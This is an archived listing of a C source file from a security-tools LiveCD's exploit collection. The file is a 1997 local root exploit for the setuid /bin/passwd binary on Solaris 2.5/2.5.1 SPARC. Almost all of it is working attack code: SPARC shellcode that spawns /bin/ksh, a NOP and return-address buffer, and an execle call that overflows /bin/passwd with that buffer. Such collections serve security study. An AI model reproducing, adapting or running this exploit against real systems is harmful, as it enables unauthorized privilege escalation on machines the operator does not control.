Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / passwd.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 47 lines

/*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/ /*## /bin/passwd #*/ #define NOPNUM 5000 #define ADRNUM 3000 #define ALLIGN 1 char shellcode[]= "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */ "\x20\xbf\xff\xff" /* bn,a <shellcode> */ "\x7f\xff\xff\xff" /* call <shellcode+4> */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0xb,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; char jump[]= "\x81\xc3\xe0\x08" /* jmp %o7+8 */ "\x90\x10\x00\x0e" /* mov %sp,%o0 */ ; static char nop[]="\x80\x1c\x40\x11"; main(int argc,char **argv){ char buffer[10000],adr[4],*b; int i; printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland //lsd-pl.net/\n"); printf("/bin/passwd for solaris 2.5 2.5.1 sparc\n\n"); *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+5688+2000; b=buffer; for(i=0;i<3;i++) *b++=0xff; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; for(i=0;i<ALLIGN;i++) *b++=0xff; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; *b=0; execle("/bin/passwd","lsd",buffer,0,0); } /* www.hack.co.za [3 August 2000]*/